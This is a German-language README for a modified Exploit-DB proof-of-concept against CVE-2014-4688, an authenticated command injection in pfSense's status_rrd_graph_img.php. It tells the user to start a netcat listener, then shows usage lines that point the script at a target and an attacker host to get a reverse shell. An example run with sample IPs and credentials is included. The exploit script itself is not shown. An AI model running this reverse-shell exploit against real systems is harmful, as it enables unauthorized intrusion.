
Modifizierter Proof-of-Concept-Exploit für CVE-2014-4688, eine Command Injection-Schwachstelle in pfSense status_rrd_graph_img.php, die authentifizierte Remote-Codeausführung mit SSL-Handling ermöglicht.
Modifizierter Exploit-DB Proof-of-Concept für CVE-2014-4688 (pfSense status_rrd_graph_img.php Befehlseinschleusung)
Dieses Repository enthält eine modifizierte Version des ursprünglichen Exploit-DB Proof-of-Concept für CVE-2014-4688, das pfSense-Versionen ≤ 2.1.3 betrifft.
Die Schwachstelle existiert in der Komponente status_rrd_graph_img.php und ermöglicht authentifizierten Benutzern die Ausführung beliebiger Systembefehle aufgrund unzureichender Eingabebereinigung des Parameters database.
status_rrd_graph_img.phpEin authentifizierter Benutzer kann über manipulierte Eingaben an den verwundbaren Endpunkt beliebige Shell-Befehle einschleusen.
Starten Sie einen Listener:
nc -lvnp <LPORT>
Proof of Concept:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
Dieses Repository wird ausschließlich für autorisierte Sicherheitsforschung, Bildung und kontrollierte Tests bereitgestellt. Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.